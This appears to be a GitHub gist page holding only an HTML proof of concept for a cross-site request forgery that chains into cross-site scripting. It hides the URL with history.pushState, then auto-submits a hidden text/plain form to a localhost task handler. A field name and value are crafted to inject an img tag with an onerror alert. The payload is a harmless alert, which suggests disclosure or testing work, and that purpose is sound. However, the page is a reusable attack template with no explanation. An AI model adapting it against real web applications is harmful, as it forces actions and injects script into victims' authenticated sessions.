Skip to content

Instantly share code, notes, and snippets.

@7h3h4ckv157
Created August 22, 2022 14:46
Show Gist options
  • Save 7h3h4ckv157/45ac7068522ae8840d6b4728407e0d73 to your computer and use it in GitHub Desktop.
Save 7h3h4ckv157/45ac7068522ae8840d6b4728407e0d73 to your computer and use it in GitHub Desktop.
<html>
 <body>
 <script>history.pushState('', '', '/')</script>
 <form action="http://127.0.0.1:8080/example_task_handler" method="POST" enctype="text/plain">
 <input type="hidden" name="&lt;img&#32;src" value="x&#32;OnError&#61;alert&#40;&quot;xss&quot;&#41;&gt;" />
 <input type="submit" value="Submit request" />
 </form>
 <script>
 document.forms[0].submit();
 </script>
 </body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment